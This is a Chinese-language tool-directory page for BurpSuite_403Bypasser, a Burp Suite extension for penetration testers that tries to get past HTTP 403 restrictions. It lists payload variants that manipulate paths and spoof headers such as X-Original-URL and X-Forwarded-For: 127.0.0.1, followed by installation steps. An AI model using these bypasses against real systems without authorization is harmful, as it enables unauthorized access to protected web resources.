Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
BurpSuite_403Bypasser — Burpsuite 扩展,用于绕过 403 限制目录 | Kitploit
工具/GitHubGitHub/sting8k/burpsuite_403bypasser
IDS/IPS规避信息收集WAF绕过Web安全渗透测试
GitHubsting8k/burpsuite_403bypasser

BurpSuite_403Bypasser

Burpsuite 扩展,用于绕过 403 限制目录

查看仓库
1.7k20755年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

403Bypasser

一个用于绕过 403 受限目录的 BurpSuite 扩展。通过被动扫描(默认启用),每个 403 请求都会被该扩展自动扫描,只需将其添加到 BurpSuite 中即可享受。

Payloads(测试载荷): $1:主机名 $2:路径

root@kitploit:~
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

感谢 @lohubi 贡献了许多测试载荷。

安装

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

截图

参考文献:

  • https://twitter.com/iam_j0ker/status/1324354024657711106?s=20
  • https://twitter.com/jae_hak99/status/1297556269960540161?s=20
  • https://twitter.com/SalahHasoneh1/status/1296572143141031945
  • https://twitter.com/lobuhisec/status/1329705441883017218
下载工具